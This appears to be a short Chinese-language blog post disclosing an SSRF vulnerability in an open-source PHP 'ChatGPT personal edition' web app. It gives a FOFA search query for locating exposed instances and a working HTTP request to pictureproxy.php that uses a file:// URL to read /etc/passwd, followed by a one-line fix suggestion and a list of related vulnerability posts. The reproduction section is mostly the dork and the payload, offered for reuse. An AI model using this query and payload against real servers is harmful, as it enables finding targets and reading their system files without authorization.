chatgpt个人版ssrf漏洞

扣脚大汉在网络2024-09-17 18:32

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码 
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
星尘安全1 天前
黑客利用 Telegram API 传播新的 Golang 后门
网络安全·黑客·漏洞·远控·后门
饮长安千年月9 天前
西湖论剑决赛IoT开发板 rce复现
物联网·网络安全·漏洞
core51210 天前
“可通过HTTP获取远端WWW服务信息”漏洞修复
nginx·漏洞·openresty·可通过http·获取远端www服务信息
NPE~17 天前
[漏洞篇]SQL注入漏洞详解
数据库·安全·渗透测试·教程·漏洞·sql注入
扣脚大汉在网络1 个月前
CVE-2025-0411 7-zip 漏洞复现
网络安全·漏洞
星尘安全1 个月前
急需升级,D-Link 路由器漏洞被僵尸网络广泛用于 DDoS 攻击
网络·智能路由器·ddos·漏洞·cve
网络安全筑盾者-燕子2 个月前
【入门级】零基础小白入门挖漏洞看——漏洞扫描工具大全
网络·计算机网络·网络安全·漏洞·挖漏洞·漏洞工具
深渊启源2 个月前
用 Ingram 和 masscan 来扫描全网存在漏洞的camera
网络安全·漏洞·ingram·masscan
明弟有理想2 个月前
Chrome RCE 漏洞复现
前端·chrome·漏洞·复现
摸鱼也很难2 个月前
RCE 命令执行漏洞 && 过滤模式 && 基本的过滤问题 && 联合ctf题目进行实践
漏洞·ctf·ctfshow·rce命令执行
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04本地部署DeepSeek教程(Mac版本)05本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程06DeepSeek r1本地安装全指南07太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)08DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具09在Windows下安装Ollama并体验DeepSeek r1大模型10Page Assist - 本地Deepseek模型 Web UI 的安装和使用